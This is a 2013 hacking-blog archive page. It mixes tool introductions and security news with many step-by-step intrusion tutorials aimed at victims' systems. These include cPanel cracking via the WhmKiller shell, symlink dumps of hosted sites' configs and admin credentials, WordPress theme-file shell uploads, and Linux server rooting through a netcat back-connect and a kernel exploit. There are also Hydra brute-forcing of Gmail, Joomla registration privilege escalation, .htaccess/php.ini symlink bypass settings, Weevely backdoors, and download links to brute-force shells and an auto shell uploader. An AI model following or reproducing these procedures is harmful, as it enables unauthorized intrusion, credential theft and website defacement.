Wanna Be hacker | Tricks and Tips | All technology News: July 2013

Wednesday, July 31, 2013

WhatWeb – Website Identification Tool | Backtrack

ccording to their website, WhatWeb identifies websites. Its goal is to answer the question, “What is that Website?”. WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1000 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.

Features:

Over 1000 plugins

Control the trade off between speed/stealth and reliability

Plugins include example URLs

Performance tuning. Control how many websites to scan concurrently.

Multiple log formats: Brief (greppable), Verbose (human readable), XML, JSON, MagicTree, RubyObject, MongoDB, SQL.

Proxy support including TOR

Custom HTTP headers

Basic HTTP authentication

Control over webpage redirection

Nmap-style IP ranges

Fuzzy matching

Result certainty awareness

Custom plugins defined on the command line

Procedure

How to open it:-

To open it goto, Backtrack >> Information Gathering >> Web Application Analysis >> CMS Identification >> whatweb or you can also open it through Terminal by opening this directorycd /pentest/enumeration/web/whatweb.

Simple Usage:-

./whatweb <url>

AGGRESSION LEVEL Mode Usage:-

There are four types of Aggression Level
1. Passive
2. Polite
3. Aggressive
4. Heavy

To use Aggression Levels, run this command ./whatweb -a <level no., default is 1> <url>

Verbose Mode Usage:-

To use verbose mode, run this command ./whatweb -v <url>

Crack cPanels using WhmKiller Shell

For educational purposes only! I will not take responsibility for you!

Hello Readers!! Today i’m gonna tell you how to crack cPanel passwords using WhmKiller Shell.

Requirements:-

Shelled website with Symlink vulnerability.

WhmKiller Shell [Click here to download].

Before we begin I suggest you to read an article on Anonymity, if you are new in hacking field.

Procedure:-

First of all create config files by following symlink tutorial.

Then find config file of whmcs,whmcs config files are mainly named asxzy-billing.txt or xyz-clients.txt etc, but all whmcs config files are look like :-

After finding the whmcs config file, upload the whmkiller shell in the server, which I have mention in the requirements and then open it.

In db_host box, copy paste the host from config file to whmkiller shell. Usually host is localhost.

In db_username, db_password, db_name and in cc_encryption_hash. Do the same thing, just copy paste all the credentials to these boxes and then click on submit button.

After a click on submit button, you will be redirected to this page if you submitted a valid credentials.

Then goto under Clients Hosting Accounts.

Now you have successfully done, log in at xyz.com:2082 or<site_ip>:2082.

How to use Joomscan | Backtrack 5 R3

Introduction

Joomscan is a Joomla vulnerability scanner. It detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla web site.

In this tutorial I’ll show you the usage and how to find vulnerabilities by joomscan.

Procedure

How to open it:-

Goto Backtrack >> Vulnerability Assessment >> Web Application Assessment >> CMS Vulnerability Identification >> joomscan, or you can open it through terminal also cd /pentest/web/joomscan.

How to use it:-

To scan a targeted web site, use this command perl ./joomscan.pl -u <url>

To scan a targeted web site using proxy, use this command

perl ./joomscan.pl -u <url> -x ip:port

Thats it. There are few more options available for this tool. Just use this command to see all available options perl ./joomscan.pl .

How to hack sites using symlink

For educational purposes only! I will not take responsibility for you!

Today I will show you how to hack websites hosted on the server using symlink. I’m not going to explain what is symlink. So lets begin.

Requirements:-

Shelled Website

Some php files which will help you to gain symlink.

To download them click here :- Click Here .

So now lets begin.

Firstly I want you to clear that it mostly works on WordPress And Joomla sites only.

First open your shelled site and then make a new directory, of whatever name you want. Ex:- xyz .

Then in that directory upload the files which I have given you in upper section.

After that Click on -rw-r–r– of config.pl .

Then from there change the value from 0644 to 0755 .

Then open the config.pl . In my case, to open config.pl, I’ll go tohttp://www.example.com/xyz/config.pl .

Then you will see a box something like this.

Then leave this tab open. And then open nsuser.php. In my case thensuser.php will be at http://www.example.com/xyz/nsuser.php.

Then in that click on Eval.

After that there would be open a window something like this.

Then click on Go button.

After that you will see a list of text something like this, copy that.

After copying paste it to the config.pl box which you have opened early. And then click on Dapatkan Config!

Then go back to directory where you have upload all the files. In my case, it was http://www.example.com/xyz/

In that directory you will get all the config files of the sites hosted on the server.

[Brief Note On Config Files :- Config Files are those which contains the database name and username, password also.]

Now you have done successfully.

You have now database name, username of database and also the password.

Now may be you have a question how to connect with database or where to put these credentials.So lets begin:-

Now the file ida.php from where you have uploaded. In my case the ida.php file is in http://www.example.com/xyz/ida.php .

Now there would be a window open like this.

After that click on sql.

Then in Login - Type username
Password - Type password
Database - Type database name

Then click on double arrow “>>” button.

Now you are connected to database.

After that make a check mark in wp_user or jom_users and then click on dump.

[Note:- There may be chances that the wp_user can renamed to another name, for example db_user etc.]

After that the dump.sql will saved at, where you have uploaded the previous files. In may case, the file dump.sql saved athttp://www.example.com/xyz/dump.sql .

So now lets open the dump.sql .

Boom !! now we have got the admin username, password and email.

Now use these credentials to login the admin panel.

But now you have the question where I put these credentials and how to know these credentials are of which site.
So now lets begin.

Copy the name of the db_user [which was found in the config file in .txt format]

Now in my case the db_user is localbus_main.

Now again open the ida.php,and then go to under Symlink section, by clicking on the Symlink.

After that click on Whole Server Symlink. Then there you a huge list of sites which are are hosted on the server.

Now then to find the site of which you got the credentials. Simply pressctrl+F then type your db_user name.

In my case the db_user is localbus,so i’ll try to search localbus.

Now your targeted site is infront of the username. Now login to your targeted site and do what ever you want.

Sniffing FTP Password Through Wireshark

For educational purposes only! I will not take responsibility for you!

Here I will demonstrate you how to sniff packets through Wireshark. Having gone through some networking basics we are now prepared to go through some practical instance. As I had said that FTP and HTTP are two of the some application protocols that pass the username and password across the network in clear text. So here, we will do some sniffing of FTP server details of some victim.

Install and run Wireshark

Go to ‘Capture‘ and select ‘Interfaces’ from the drop-down.

I select the VMWare network adapter since I am using VMWare for demonstrating this. Go to Options

Check that the Promiscuous mode checkbox is selected and I also opted to use the Capture filter to narrow the sniffed packets. That is, it targets the packet activity of the specific IP used as the Capture filter. Done with the setting, press the Start button. Now, wait for the victim to login to the FTP server. I am using Ubuntu OS at the victim end on the same network.

I have setup the FTP server at some IP 192.168.48.128. The sooner the victim logs in. The login details get sniffed and get listed out as:

Check the rows highlighted in blue, in the above snapshot. One show the user-name and the other shows the password of the victim. I hope, this was quite informative from my side.

Direct Shell Upload in WordPress

For educational purposes only! I will not take responsibility for you!

I had kept this topic on hold since long, as it was planned to be the last of the recently targeted posts on exploiting WordPress. This topic involves replacing the existing code in a theme file with that of the shell, and that to after the login has been cracked using wordpress login bruteforce or using some symlink bypass technique on the vulnerable server i.e. only after the attacker has successfully logged into the victim’s dashboard.

So let’s check out how exactly this is accomplished.

The attacker logs into the victim’s account Dashboard, goes to the Appearance menu on the left hand side and selects the submenu ‘Editor‘ as shown below:

Clicking on ‘Editor‘, the attacker is taken to editing the ‘style.css’ of the currently active theme. To the right of it, click on ’comments.php’ as shown:

Now the ‘comments.php‘ opens in the editor. The attacker deletes the current content of the file and puts in his own shell code as shown:

I have entered the custom php code for demo. The attacker enters his own custom php shell code instead. Update the changes and open up the browser and go to something like:

http://127.0.0.1/wordpress/wp-content/themes/assembler/comments.php

Which nothing but runs the ‘comments.php’ file on the server thereby running the malicious shell, which can be further taken to the extent of defacing the victim’s website.

Also you might be wondering that since the attacker has already logged in to the victim’s dashboard, what’s the use then to upload the shell?

The answer is that the attacker is not yet happy with just the dashboard access. So, in order to get access to the main index file, that may or may not be present in the currently active WordPress theme, the attacker prefers uploading a shell and finding the way to ‘index.php’ file, which on being found, he/she screws it down further leading to the complete defacement of the website.

This is it. I hope this was worth looking at. You might have read several topics on the same but this was my way to presenting it. Thank you all and stay tuned!

Linux Server Rooting

For educational purposes only! I will not take responsibility for you!

In this post, I will be demonstrating how to root a Linux server with a shell uploaded to it. I will be moving step-wise that’s definitely going to bring out the best tutorial on Linux server rooting all over the web.

Assuming that I have already uploaded a shell on some website on the server with a change that specifies the attacker’s IP and the appropriate port as shown below:

Now, the attacker with the IP ‘192.168.48.189‘ starts listening for a connection through Netcat as:

Now, my shell on the server looks something like:

with several PHP backconnect links. As soon as I click on one of them, the terminal window which was listening for the connection, shows up like this:

Type uname to get the server version running as:

Cool, it’s 3.0.0-12-generic! The attacker googles for the version’s exploit by searching ‘Linux server 3.0.0-12-generic exploit‘ and gets one for him. In our case let it be ‘exploit.c‘

Now, traverse to the ‘/tmp‘ directory, which is always writable. Next, the attacker creates a custom directory there (say ‘exploit‘ ) as:

The attacker has successfully created the ‘exploit‘ directory and added the exploit.c file to it. Now, he needs to compile the exploit.c file and create an output file (say it to be ‘rooted‘) in the same directory. To do so, the attacker proceeds further like:

This is almost done. The attacker now changes the file permission of rooted to ‘777‘ as:

Now execute the output file and done!

The attacker types ‘id‘ and he can see that he has successfully gained the root access to the server.

Tuesday, July 30, 2013

Hack Gmail Password Account using Hydra

Here is a small tutorial for those who are asking how to hack gmail account. So lets get into tutorial. Open Kali terminal and type.
Also you can Manually get this way

Kali Linux->Passwords Attacks->Online Attacks->Hydra Now when it opened select target tab, and then

Single Target: smtp.gmail.com

Protocol: smtp Now in In passwords tab, select

Username: Type Victim Email ID

In the passwords, select the password list option and browse to select your

(Note : your password list should contain all possible password list better always create custom password list ) Passwords file. you can get a good list http://adf.ly/T9IfX

Ok now we are ready to attack now click on start And wait for some while you will get the password.

Joomla! 1.6/1.7/2.5 Privilege Escalation Vulnerability

#Haxor32

Joomla! 1.6.x/1.7.x/2.5.0-2.5.2 suffers from a privilege escalation vulnerability that allows users to be registered into any group not having ‘core.admin’ privileges.

In order to be exploited, an attacker must visit index.php?option=com_users&view=registration and start creating a new user. During the initial creation, the attacker must cause the registration to fail by either NOT using the same password in both password fields or by purposefully failing the captcha (in 2.5.x). Before submitting the form, the attacker can use Firebug/Tamper Data to add the following parameter to the form data (assuming the site still has the default user groups enabled):

Firebug: <input name=”jform[groups][]” value=”7″ />

Tamper Data: jform[groups][]=7

The form should reload, complaining that the passwords didn’t match. This causes the group data to be stored into the session as form data. Once this is complete, giving valid values for the password fields and re-adding the parameter from before will cause the newly registered user to be assigned to the “Administrator” group because the user registration model reassigns the user to any group found to already exist in the session form data (but NOT to the groups directly given in the request).

After activating the account, the attacker will have a valid account with permissions to log in to the administrator/ interface, edit one of the templates, and inject php code (assuming the stock permissions/user groups are still in effect). Joomla! versions 1.6.x and 1.7.x also allow users in the “Administrator” group to install extensions, thus opening another avenue for code injection.

Joomla! versions 1.0.x, 1.5.x, and 2.5.3+ are not vulnerable. No patch has been issued for 1.6.x or 1.7.x and users of these versions are strongly urged to upgrade to 2.5.3 immediately.

Joomla and WordPress sites Finder and Brute Forcer

#Haxor32

Joomla and WordPress Sites Finder and Brute Forcer

Enjoy guys

The Archive Contains

1. Joomla BruteForcer PHP Shell

2. WordPress BruteForcer PHP Shell

3. Joomla Sites Finder from a Server PHP Shell

4. WordPress Sites Finder from a Server PHP Shell

5. Private 1337day Server Exploiter to Auto Find and BruteForce Joomla and WordPress Sites

6. WordPress Brute Forcer Software to Work Faster with a Big Pass List

Enjoy Guys ….

Download Direct: http://0453f0cc.linkbucks.com/

Download: https://rapidshare.com/#!download|926p1|4200348640|tools.rar|31|0|0|1|referer-DA1E6A2E71F90A7705C17C4AC939D24D

WordPress Scanner v 1.0

Hi all my friends today i will present you a nice tool for WordPress wich you can scan with it a website using wordpress and check vulnerability to exploit in localhost and do remote code execution to inject script and modify the website.

Download: http://www14.zippyshare.com/v/64683218/file.html

Bypass Symlink in Apache Servers

Hello everybody , today i’m going to explain how to bypass symlink in ovh server, well most of hackers find problem in ovh when trying to symlink the server ! this method was found by Mauritania Attacker and it’s still private , but i decided it to publish it in public.

First you gonna create a dir call it what you want example “Hak” then create a ‘.htaccess” file in the folder “Hak”

CODE:

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .lnx

AddHandler cgi-script .lnx

Secondly we gonna create a second folder we call it example “Haksecurity” we also make an “.htaccess” file

CODE:

#Developped by Mauritania Attacker

Options +FollowSymLinks

DirectoryIndex Index.html

Options +Indexes

AddType text/plain .php

AddHandler server-parsed .php

AddType root .root

AddHandler cgi-script .root

Then we create also in the folder “Haksecurity” a file called “php.ini”

CODE:

safe_mode = Off

disable_functions =

safe_mode_gid = Off

open_basedir = Off

register_globals = on

exec = On

shell_exec = On

so here we come to the last part !

we gonna retrieve the configs by typing the following command :

ln -s / Haksecurity

Here we go we have succesfully retrieved the root path , so now to find the configs , we can upload a perl file in “Haksecurity” and paste the users of the server “etc/passwd”

and the rest is very basic.

Monday, July 29, 2013

How to use Vega web vulnerability scannner on Kali Linux

Sunday, July 28, 2013

New Forum about Pentest, Hacking, Security

Here is new forum where you can learn about pentest/security. We will try to answer on all your questions.

When you register write something about you.

Forum: http://haksecurity.com/forum

Saturday, July 27, 2013

Joomla JCE Remote File Upload exploit (Zero Day)

Joomla JCE Remote File Upload exploit

Exploit name: Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - PHP Version

DORK: inurl:/images/stories/

Vulnerable Version: JCE 2.0.10 (prior versions also may be affected)

Exploitation: Remote with browser

Coded By: Mostafa Azizi

DOWNLOAD LINKS:

JCE.php --- http://adf.ly/SyEvh
joomla.pl --- http://adf.ly/SyEzw
upload.php --- http://adf.ly/SyF6b
Madspot shell --- http://adf.ly/SyFYY

Kali Linux 1.0.4 Released

In keeping with our tradition of publishing new releases during the annual Black Hat and DEF CON conferences, we are pleased to announce the availability of Kali Linux 1.0.4. The last few months since the initial release of Kali have seen a large number of changes, upgrades, and improvements in the distribution, all of which are included in version 1.0.4.

Kali Linux is an open source project Which Is developed By the Offensive Security. as the successor to BackTrack Linux. This Kali Linux Update release with more new addition tool

Winexe

Pass the Hash Toolkit

enum4linux

RegRipper

rfcat

Unicornscan

jSQL

JD-GUI

Ubertooth

Ghost Phisher

Uniscan

Arachni

Bully

In addition to the new tools added to the distribution, version 1.04 of Kali Linux also contains many upgraded packages. Some of the more notable updates are:

OpenVAS

Volatility

Durandal’s Backdoor

Maltego

OWASP ZAP

Armitage

DNSrecon

Vega

WPScan

For More info on Kali Linux visit Official blog by Click Here or Download ISO Image from Download page

As usual, you do not need to re-download Kali Linux 1.0.4 if you already have it installed. A regular “apt-get update && apt-get dist-upgrade” will do the job of getting you to the latest and greatest!

SIM Cards can be Hacked; Give me any phone number i will clone that researcher says

In this Modern Era everyone knows that his/her latest mobile can be hacked by hackers but now The simcard hacking flaw was discovered by German programmer Karsten Nohl, who has informed mobile operators of the potential danger.

After that all the Mobile phone users have been put on an alert that their sim cards can be hacked anytime which leads to fraud and soaring premium rate bills.

On the other hands, if we talk about the mobile operators then they says that they already aware about this flaw and taking steps to patch the flaw before customers are hit.

Worldwide Mobile Phones are Major source to be used in accessing online banking and other sensitive personal information and if the discovered flaw will be used by Hackers can make a privacy disaster, this flaw also makes some noise for the mobile customers who use their smartphones to pay bills and transfermoney.

The security flaw is due to aging sim card security technology, which has struggled to keep up with high-tech smartphones such as the iPhone and Samsung’s Galaxy S4.

Flaw Researcher (Karsten Nohl) says something about his Flaw:

“Give me any phone number and there is some chance I will, a few minutes later, be able to remotely control this SIM card and even make a copy of it,”

The hack works by manipulating a coding technology used by operators to update sim cards. Properly equipped, a hacker can send a code to a sim card to gain access to a phone’s systems, from where fraudulent activity can be perpetrated.

Nohl said that a quarter of all sim cards he tested could be hacked.

However, the international umbrella mobile operator organisation, the GSMA, said that the flaw was limited to a minority of sim cards and that newer sim cards may not be affected.. It said that it had advised operators of the security risks involved.

From: http://hackersnewsbulletin.com

HOW CAN YOU MAKE YOUR PASSWORD UNBREAKABLE ?

Space search Calculator:

yes it is https://www.grc.com/haystack.htm

So what it does ?

This calculator is designed to help users understand how many passwords can be created from different combinations of character sets (lowercase only, mixed case, with or without digits and special characters, etc.) and password lengths.

The calculator then puts the resulting large numbers (with lots of digits or large powers of ten) into a real world context of the time that would be required (assuming differing search speeds) to exhaustively search every password up through that length, assuming the use of the chosen alphabet.

On this page you’ll find:

Password Related Links

A Large-Scale Study of Web Password Habits ‑ THOROUGH & interesting 9-page Microsoft Research PDF.

Analysis of the passwords SONY lost ‑ in one of their 2011 network breaches.

The password cracking power of GPU’s ‑ the need to recalibrate our password length thinking.

A homebrew password cracking system ‑ that cracks at 33.1 billion passwords per second!

An analysis from a major site breach of the passwords users had chosen. VERY interesting!

Top 10 Most Common Passwords ‑ Another interesting snapshot of typical users.

The Top 500 Worst Passwords of All Time ‑ (Profanity Warning) ‑ A list that wasn’t edited.

Why Steve Gibson’s Password Padding Works for Humans ‑ An interesting post about cognitive science.

and much more information that you can’t believe yourself .
It is Gibson Research corporation[US].
Good luck ;)

Friday, July 26, 2013

DroidSQLi : First automated MySQL Injection tool for Android

DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks.
DroidSQLi supports the following injection techniques:
- Time based injection
- Blind injection
- Error based injection
- Normal injection
It automatically selects the best technique to use and employs some simple filter evasion methods.

Legal notice: this application is for educational purposes ONLY. No warranties of any kind are expressed or implied. Use at your own risk!

DOWNLOAD: http://adf.ly/PGVvw

How to make a backdoor using Weevely

Today Ill tell you how to use Weevely to make a backdoor from a server.
So now lets begin:-
I’m not goin to tell you about the commands of Linux
Requirements:-

Backtrack

Shelled Server

Basic knowledge of Linux commands

Here we go

Now open terminal, goto the directory cd /pentest/backdoors/web/weevely.

It will look something like this

- Now in the same directory type, ./weevely.py and then hit enter.[It will show you the usage of weevely]
- Now type ./weevely.py generate <password> <location, where u want to save file> .It will look something like this
- 1. generate is used to make a file, which will be used by weevely, as a door between you and the server.]
  - Then upload that file in your shelled server, which you have make just in above step.
  - After uploading it, copy the url of your uploaded file. Then type./weevely.py <url> <password> .It will look something like this
  - - Now hit enter
    - Boom !! Now you are connected with the server Here is a snapshot
    - This is only for educational purpose, we are not responsible to any harm or illegal activity done by you.